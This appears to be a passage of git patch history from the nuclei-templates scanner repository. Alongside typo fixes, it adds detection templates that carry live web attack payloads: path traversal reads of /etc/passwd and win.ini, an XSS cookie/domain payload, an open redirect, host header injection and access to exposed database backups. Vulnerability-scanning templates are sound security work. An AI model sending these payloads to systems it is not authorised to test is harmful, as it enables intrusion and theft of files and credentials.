https://github.com/mpgn/Spring-Boot-Actuator-Exploit @@ -31,4 +31,4 @@ requests: - type: word words: - "X-Application-Context" - part: header \ No newline at end of file + part: header diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index e97f2aa339..944c6b04b2 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -3,11 +3,11 @@ id: azkaban-workflow info: name: Azkaban Security Checks author: pdteam - description: A simple workflow that runs all azkaban related nuclei templates on a given target. + description: A simple workflow that runs all Azkaban related nuclei templates on a given target. tags: workflow workflows: - template: exposed-panels/azkaban-web-client.yaml subtemplates: - - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml \ No newline at end of file + - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 10db14b804..315999a816 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -3,7 +3,7 @@ id: bigip-workflow info: name: F5 BIG-IP Security Checks author: dwisiswant0 - description: A simple workflow that runs all Bigip related nuclei templates on a given target. + description: A simple workflow that runs all BigIP related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) @@ -14,4 +14,4 @@ workflows: - template: technologies/bigip-config-utility-detect.yaml subtemplates: - - template: cves/2020/CVE-2020-5902.yaml \ No newline at end of file + - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 6dcd34dc47..3499322be0 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -3,10 +3,10 @@ id: lucee-workflow info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk - description: A simple workflow that runs all Lucee related nuclei templates on given target. + description: A simple workflow that runs all Lucee related nuclei templates on a given target. tags: workflow workflows: - template: technologies/lucee-detect.yaml subtemplates: - - tags: lucee \ No newline at end of file + - tags: lucee diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 97b372c544..acaad19e2b 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -1,9 +1,9 @@ id: springboot-workflow info: - name: Springboot Security Checks + name: Spring Boot Security Checks author: dwisiswant0 - description: A simple workflow that runs all springboot related nuclei templates on a given target. + description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) @@ -13,4 +13,4 @@ workflows: - template: technologies/springboot-actuator.yaml subtemplates: - - tags: springboot \ No newline at end of file + - tags: springboot diff --git a/workflows/worksite-takeover-workflow.yaml b/workflows/worksite-takeover-workflow.yaml index ed95574336..41429fc2b8 100644 --- a/workflows/worksite-takeover-workflow.yaml +++ b/workflows/worksite-takeover-workflow.yaml @@ -3,10 +3,10 @@ id: worksite-takeover-workflow info: name: Worksite Takeover Workflow author: pdteam - description: A simple workflow that runs DNS based detection to filter hosts runnng worksite and do further HTTP based check to confirm takeover. + description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover. reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites workflows: - template: dns/worksites-detection.yaml subtemplates: - - template: takeovers/worksites-takeover.yaml \ No newline at end of file + - template: takeovers/worksites-takeover.yaml From 0835b26f23aa31be4222dabfc780ecbb04cde8c7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Sep 2021 06:03:05 +0700 Subject: [PATCH 060/339] Create CVE-2010-2920.yaml --- cves/2010/CVE-2010-2920.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2920.yaml diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml new file mode 100644 index 0000000000..48974bc25f --- /dev/null +++ b/cves/2010/CVE-2010-2920.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2920 + +info: + name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12120 + - https://www.cvedetails.com/cve/CVE-2010-2920 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 75bee6e8f5aadd8374d8de5aea8cf73ce48a4cad Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Sep 2021 07:00:44 +0700 Subject: [PATCH 061/339] Create CVE-2010-1472.yaml --- cves/2010/CVE-2010-1472.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1472.yaml diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml new file mode 100644 index 0000000000..4294244baf --- /dev/null +++ b/cves/2010/CVE-2010-1472.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1472 + +info: + name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12167 + - https://www.cvedetails.com/cve/CVE-2010-1472 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 99d51ba4bcfd783fe4b2f1bd99e25ded515f2d71 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:54:33 +0900 Subject: [PATCH 062/339] Create karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 karel-ip-phone-lfi.yaml diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml new file mode 100644 index 0000000000..c18a46fbf8 --- /dev/null +++ b/karel-ip-phone-lfi.yaml @@ -0,0 +1,24 @@ +id: karel-ip-phone-lfi + +info: + name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal + author: 0x_Akoko + severity: high + reference: https://cxsecurity.com/issue/WLB-2020100038 + tags: karel,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 37b81df9cc6e432762452daa8cd924c9d306ba61 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:56:20 +0900 Subject: [PATCH 063/339] Create minimouse-lfi.yaml --- minimouse-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 minimouse-lfi.yaml diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml new file mode 100644 index 0000000000..b5c828851c --- /dev/null +++ b/minimouse-lfi.yaml @@ -0,0 +1,26 @@ +id: minimouse-lfi + +info: + name: Mini Mouse 9.2.0 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/49744 + tags: minimouse,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 278ae78af02cb01b5d17965df5fd39dff5f48373 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:58:24 +0900 Subject: [PATCH 064/339] Create CVE-2019-7275.yaml --- CVE-2019-7275.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 CVE-2019-7275.yaml diff --git a/CVE-2019-7275.yaml b/CVE-2019-7275.yaml new file mode 100644 index 0000000000..a3e1a53202 --- /dev/null +++ b/CVE-2019-7275.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-7275 + +info: + name: Open Redirect in Optergy Proton/Enterprise BMS + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2019110074 + severity: low + tags: cves,optergy,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/updating.jsp?url=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 1f5da5331757d50c1ed7eeebb483e4af23fd2df8 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 18:00:23 +0900 Subject: [PATCH 065/339] Update minimouse-lfi.yaml --- minimouse-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml index b5c828851c..b87dc7de10 100644 --- a/minimouse-lfi.yaml +++ b/minimouse-lfi.yaml @@ -1,7 +1,7 @@ id: minimouse-lfi info: - name: Mini Mouse 9.2.0 - Path Traversal + name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/49744 From 861af1bdc8339b2c65869f1d135a9be5f9ef9ea5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:39:22 +0530 Subject: [PATCH 066/339] Update and rename CVE-2019-7275.yaml to cves/2019/CVE-2019-7275.yaml --- CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml (60%) diff --git a/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml similarity index 60% rename from CVE-2019-7275.yaml rename to cves/2019/CVE-2019-7275.yaml index a3e1a53202..1945fe217d 100644 --- a/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -3,9 +3,12 @@ id: CVE-2019-7275 info: name: Open Redirect in Optergy Proton/Enterprise BMS author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2019110074 severity: low - tags: cves,optergy,redirect + reference: + - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html + - https://applied-risk.com/resources/ar-2019-008 + - https://cxsecurity.com/issue/WLB-2019110074 + tags: cve,cve2019,redirect requests: - method: GET From 7579fe98c2466fc0d15cdd56ab0f8eb4c88aca55 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:44:39 +0530 Subject: [PATCH 067/339] Update and rename minimouse-lfi.yaml to vulnerabilities/other/minimouse-lfi.yaml --- minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml | 1 + 1 file changed, 1 insertion(+) rename minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml (99%) diff --git a/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml similarity index 99% rename from minimouse-lfi.yaml rename to vulnerabilities/other/minimouse-lfi.yaml index b87dc7de10..2fe4f3ad61 100644 --- a/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -17,6 +17,7 @@ requests: - type: status status: - 200 + - type: word words: - "bit app support" From 6ef02fe9dd367e95117881479e663058842e75d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:47:45 +0530 Subject: [PATCH 068/339] Update karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml index c18a46fbf8..d911d65f7e 100644 --- a/karel-ip-phone-lfi.yaml +++ b/karel-ip-phone-lfi.yaml @@ -4,7 +4,9 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2020100038 + reference: + - https://cxsecurity.com/issue/WLB-2020100038 + - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon tags: karel,lfi requests: From 21a7fc63a50880b0e667023f7d4bf03ed342d21b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 15:16:12 +0530 Subject: [PATCH 069/339] Update CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 65318224ba..26175c05d3 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E' + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "'>" + - "" part: body - type: word From c105e41fa40f0aa7afdbe932d371fc85857ab4d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:13:17 +0530 Subject: [PATCH 070/339] Added OpenVPN Host Header Injection Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/openvpn-hhi.yaml diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml new file mode 100644 index 0000000000..8da79e0901 --- /dev/null +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -0,0 +1,27 @@ +id: openvpn-hhi + +info: + name: OpenVPN Host Header Injection + author: twitter.com/Dheerajmadhukar + severity: info + tag: openvpn,hhi + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + + - type: word + words: + - "https://{{randstr}}.tld/__session_start__/" + - "openvpn_sess" + part: header + condition: and + + - type: status + status: + - 302 From cec54e6d518e7d5862b904272ea423faccd3c0bc Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:15:07 +0530 Subject: [PATCH 071/339] tags update Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 8da79e0901..73ecf8ec1c 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tag: openvpn,hhi + tags: openvpn,hhi requests: - raw: From 47a892d375c7891006e8f196a3a6dc2a1d07c813 Mon Sep 17 00:00:00 2001 From: push4d <50226388+push4d@users.noreply.github.com> Date: Mon, 6 Sep 2021 13:21:29 +0200 Subject: [PATCH 072/339] Add files via upload --- cves/2021/CVE-2021-20114.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2021/CVE-2021-20114.yaml diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml new file mode 100644 index 0000000000..c96a554177 --- /dev/null +++ b/cves/2021/CVE-2021-20114.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-20114 + +info: + name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor + author: n/a + severity: high + reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + description: | + When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + tags: cve,cve2021,tcexam + +requests: + - method: GET + path: + - "{{BaseURL}}/cache/backup/" + + matchers: + - type: status + status: + - 200 \ No newline at end of file From 6563f9be814588136437d2bbd190f654ad3c7b07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 16:56:14 +0530 Subject: [PATCH 073/339] Update CVE-2019-11013.yaml --- cves/2019/CVE-2019-11013.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index ba86250503..afd00e4a16 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -4,7 +4,9 @@ info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/47301 + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble requests: From 6abfcd80e1052425254d2931270b04f3376afc23 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:13:20 +0530 Subject: [PATCH 074/339] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 842f66380f61b163fd9ce94bac8697f9cb4464ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:13:48 +0530 Subject: [PATCH 075/339] Revert "Create host-header-injection.yaml" This reverts commit 6abfcd80e1052425254d2931270b04f3376afc23. --- .../generic/host-header-injection.yaml | 32 ------------------- 1 file changed, 32 deletions(-) delete mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml deleted file mode 100644 index 9166fdec4d..0000000000 --- a/vulnerabilities/generic/host-header-injection.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: host-header-injection - -info: - name: Host Header Injection - author: princechaddha - severity: info - description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. - reference: - - https://portswigger.net/web-security/host-header - - https://portswigger.net/web-security/host-header/exploiting - - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ - tags: hostheader-injection,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - headers: - Host: "{{randstr}}.tld" - - matchers-condition: and - matchers: - - type: word - words: - - '{{randstr}}.tld' - part: body - condition: and - - - type: status - status: - - 200 From acd46242008553c52b03928308ead6a9d808e174 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:14:27 +0530 Subject: [PATCH 076/339] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 1942d13ed6e3b89e1e2063e0a8fca881a489b564 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:15:30 +0530 Subject: [PATCH 077/339] Update openvpn-hhi.yaml --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 73ecf8ec1c..2611426abb 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tags: openvpn,hhi + tags: openvpn,hostheader-injection requests: - raw: From e1ab21616f0752e849104a9146a4778b0fe6b0f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:30:51 +0530 Subject: [PATCH 078/339] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c96a554177..c0a6d7dbf0 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -4,17 +4,26 @@ info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor author: n/a severity: high - reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true - description: | - When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. - tags: cve,cve2021,tcexam + description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + reference: + - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 + tags: cve,cve2021,tcexam,disclosure requests: - method: GET path: - "{{BaseURL}}/cache/backup/" + matchers-condition: and matchers: + - type: word + words: + - "Index of /cache/backup" + - "Parent Directory" + - ".sql.gz" + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From e9d5665383db40a06c6b91aa8f023f31a4b7f0e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:34:51 +0530 Subject: [PATCH 079/339] Update gsoap-lfi.yaml --- vulnerabilities/other/gsoap-lfi.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml index f7bd7c67e7..e679dee126 100644 --- a/vulnerabilities/other/gsoap-lfi.yaml +++ b/vulnerabilities/other/gsoap-lfi.yaml @@ -8,9 +8,13 @@ info: tags: gsoap,lfi requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../etc/passwd" + - raw: + - | + GET /../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 + Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close matchers-condition: and matchers: From 54e5eea58124202e3b34ee07f84a1c495b84fa82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:48:01 +0530 Subject: [PATCH 080/339] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c0a6d7dbf0..981a841397 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -2,7 +2,7 @@ id: CVE-2021-20114 info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor - author: n/a + author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. reference: From ec072ea1c83390d2e1c4d951e9a42432af37092e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 20:11:21 +0530 Subject: [PATCH 081/339] misc update --- default-logins/abb/cs141-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 531ed5ae2d..1f3cfe52ce 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login + additional-fields: + shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: From 8ed50e204ff49278a8dd849ec8d36ae25ab66a78 Mon Sep 17 00:00:00 2001 From: ahmetpergamum Date: Mon, 6 Sep 2021 17:52:56 +0300 Subject: [PATCH 082/339] Added Watchguard Panel Template --- exposed-panels/watchguard.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/watchguard.yaml diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard.yaml new file mode 100644 index 0000000000..e1af7a14ae --- /dev/null +++ b/exposed-panels/watchguard.yaml @@ -0,0 +1,25 @@ +id: watchguard + +info: + name: Watchguard + author: ahmetpergamum + severity: info + reference: https://www.exploit-db.com/ghdb/7008 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/sslvpn_logon.shtml' + + matchers-condition: and + matchers: + - type: word + words: + - 'User Authentication' + - 'WatchGuard Technologies' + condition: or + + - type: status + status: + - 200 From 5450030da6ef2de9aa997a92edfca336dfbb3317 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Sep 2021 21:20:15 +0530 Subject: [PATCH 083/339] Add files via upload --- technologies/iplanet-web-server-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/iplanet-web-server-detect.yaml diff --git a/technologies/iplanet-web-server-detect.yaml b/technologies/iplanet-web-server-detect.yaml new file mode 100644 index 0000000000..53d293ec84 --- /dev/null +++ b/technologies/iplanet-web-server-detect.yaml @@ -0,0 +1,21 @@ +id: iPlanet-web-server-detect +info: + name: Detect iPlanet Webserver Detection + author: pussycat0x + severity: info + reference: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" - fofa query + tags: default,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "iPlanet" + condition: and + - type: status + status: + - 200 \ No newline at end of file From ea21075b712ceebd9a7ce28184bc43db3ce791de Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 23:57:29 +0530 Subject: [PATCH 084/339] misc update --- ...eb-server-detect.yaml => iplanet-web-server.yaml} | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) rename technologies/{iplanet-web-server-detect.yaml => iplanet-web-server.yaml} (62%) diff --git a/technologies/iplanet-web-server-detect.yaml b/technologies/iplanet-web-server.yaml similarity index 62% rename from technologies/iplanet-web-server-detect.yaml rename to technologies/iplanet-web-server.yaml index 53d293ec84..1b3b79c375 100644 --- a/technologies/iplanet-web-server-detect.yaml +++ b/technologies/iplanet-web-server.yaml @@ -1,21 +1,25 @@ -id: iPlanet-web-server-detect +id: iplanet-web-server + info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info - reference: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" - fofa query - tags: default,tech + tags: tech + additional-fields: + fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "iPlanet" - condition: and + - type: status status: - 200 \ No newline at end of file From fe784d49e0584a856b4a564e44dcabc3129731f2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 00:00:25 +0530 Subject: [PATCH 085/339] misc update --- exposed-panels/{watchguard.yaml => watchguard-panel.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename 